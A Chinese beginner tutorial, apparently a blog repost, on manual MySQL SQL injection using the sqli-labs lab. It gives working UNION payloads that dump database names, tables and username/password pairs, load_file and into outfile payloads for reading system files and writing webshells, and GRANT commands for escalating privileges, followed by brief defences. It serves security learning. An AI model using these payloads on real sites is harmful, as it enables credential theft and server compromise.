当前位置：首页 > article >正文

SQL注入零基础学习二MYSQL手工注入

article 2026/2/22 16:11:09

1.SQL注入之sqli-labs环境搭建

1.Sqli-labs项目地址—Github获取：GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based.

Sqli-labs环境安装
需要安装以下环境
apache+mysql+php
Windows版phpstudy下载 - 小皮面板(phpstudy) (xp.cn)

2.下载好之后将Sqli-labs项目放到phpstudy的WWW目录下

4.要想phpstudy中自带mysql正常使用，需确保本地没有下载mysql服务器，如有需要关闭本地mysql服务，防止端口占用！

5.进入sql-connections找到db-creds文件进行配置，phpstudy中默认账号和密码为 root

6.phpstudy自带的php版本过高，不兼容sqli-las靶场中php的版本，需要手动设置为低版本

7.检查是否更换好：点击网站 --> 管理 --> php版本 -->

8.启动apache和mysql

9.打开网页127.0.0.1/sqli_labs_sqli-php7/

2.SQL注入之MySQL手工注入

浏览器进行数据提交服务器：
get 提交： url 数据长度受限制（速度快；用于：数据不敏感，安全不敏感）
post 提交：服务器安全性高数据量大

2.1注入流程：

1.判断注入点

2.猜解列名数量 order by

3.报错猜解，判断回显点

4.信息收集

5.使用对应的SQL语句执行注入查询

2.2注入语句

sqli-labs数字型注入

尝试手工注入：
       SQL注入：
       1.判断有无注入点 and 1 = 1；
       2.猜解列名数量 order by %20 空格
       3.报错，判断回显点 union
       4.信息收集
查询数据库版本 version()
?id=-1 union select 1,version(),3
       高版本：5.0以上，有系统库：infromation
  低版本：5.0一下无系统库
        5.使用对应SQL进行注入
注意：= 前后连到一起，字符转行 16进制
（1）查询数据库名称：database()
?id=-1 union select 1,version(),database()
（2）查询查找表名
select table_name from infromation_schema.tables where table_schema=database();
SQL:
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
（3）查询表里面有哪些字段
select column_name from information_schema.column where tabel_name=users;
SQL:
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273
   （4）查询字段username,password数据
select username,password from users
SQL:
?id=-1 union select 1,2,(select group_concat(username,0x3a,password)from users)

3.SQL注入之高权限注入上

3.1多个网站共享mysql服务器

root用户拥有最高权限可以对多个网站进行管辖，普通用户仅拥有当前网站和配置的部分权限。

3.2MySQL 权限级别分为：

全局性的管理权限：作用于整个MySQL实例级别
数据库级别的权限：作用于某个指定的数据库上或者所有的数据库上
数据库对象级别的权限：作用于指定的数据库对象上（表、视图等）或者所有的数据库对象

3.3MySQL 权限介绍

mysql中存在4个控制权限的表，分别为user表，db表，tables_priv表，columns_priv表，

User表：存放用户账户信息以及全局级别（所有数据库）权限，决定了来自哪些主机的哪些用户可以访问数据库实例，如果有全局权限则意味着对所有数据库都有此权限

Db表：存放数据库级别的权限，决定了来自哪些主机的哪些用户可以访问此数据库

Tables_priv表：存放表级别的权限，决定了来自哪些主机的哪些用户可以访问数据库的这个表

Columns_priv表：存放列级别的权限，决定了来自哪些主机的哪些用户可以访问数据库表的这个字段

Procs_priv表：存放存储过程和函数级别的权限

3.3.1mysql权限表的验证过程为：

先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在，存在则通过验证。
通过身份认证后，进行权限分配，
按照user，db，tables_priv，columns_priv的顺序进行验证。
即先检查全局权限表user，如果user中对应的权限为Y，则此用户对所有数据库的权限都为Y，
将不再检查db, tables_priv,columns_priv；如果为N，则到db表中检查此用户对应的具体数据库，
并得到db中为Y的权限；如果db中为N，则检查tables_priv中此数据库对应的具体表，取得表中的权限Y，以此类推。

3.4MySQL权限的增删改查

3.4.1查看mysql 有哪些用户：

select user,host from mysql.user;

3.4.2查看用户对应权限

select * from user where user='root' and host='localhost'\G; #所有权限都是Y ，就是什么权限都有

3.4.3创建 mysql 用户

有两种方式创建MySQL授权用户

执行create user/grant命令（推荐方式）
CREATE USER 'test1'@'localhost' IDENTIFIED BY '123456';

通过insert语句直接操作MySQL系统权限表

3.4.4只提供id查询权限

grant select(id) on test.t1 to test1@'localhost' identified by '123456';

3.4.5把普通用户变成管理员

GRANT ALL PRIVILEGES ON *.* TO 'test1'@'localhost' WITH GRANT OPTION;

3.4.6删除用户

drop user finley@'localhost';

4.SQL注入之高权限注入下

4.1.查询所有数据库名称

?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata

4.2.查询数据库对应的表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x74657374

4.3.查询表名对应的字段名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7431

4.4.查询数据

?id=-1 union select 1,name,password from test.t1

5.SQL注入之文件读写

文件读写注入的原理

就是利用文件的读写权限进行注入，它可以写入一句话木马，也可以读取系统文件的敏感信息。

文件读写注入的条件

高版本的MYSQL添加了一个新的特性secure_file_priv，该选项限制了mysql导出文件的权限

show global variables like '%secure%' 查看mysql全局变量的配置

读写文件需要 `secure_file_priv`权限

`secure_file_priv=`

代表对文件读写没有限制

`secure_file_priv=NULL`

代表不能进行文件读写

`secure_file_priv=d:/phpstudy/mysql/data`

代表只能对该路径下文件进行读写

5.2读取文件

使用函数：`load_file()`

?id=-1 union select 1,load_file('d:/d.txt),3

注意：路径中斜杠是/不是\。后面的路径可以是单引号，0x，char转换的字符。

5.3写入文件

使用函数：`Into Outfile`（能写入多行，按格式输出）
`into Dumpfile`（只能写入一行且没有输出格式）

?id=-1 union select 1,'xy',3 into outfile 'D:/d.txt'--+

outfile 后面不能接0x开头或者char转换以后的路径，只能是单引号路径

6. SQL注入之基础防御

6.1魔术引号

魔术引号（Magic Quote）是一个自动将进入 PHP 脚本的数据进行转义的过程。
最好在编码时不要转义而在运行时根据需要而转义。

魔术引号：在php.ini文件内找到

magic_quotes_gpc = On 开启将其改为 magic_quotes_gpc = Off 关闭

6.2内置函数

做数据类型的过滤

is_int()等

addslashes()

mysql_real_escape_string()

mysql_escape_string()

6.3自定义关键字

str_replace()

6.4其他安全防护软件

WAF 等等；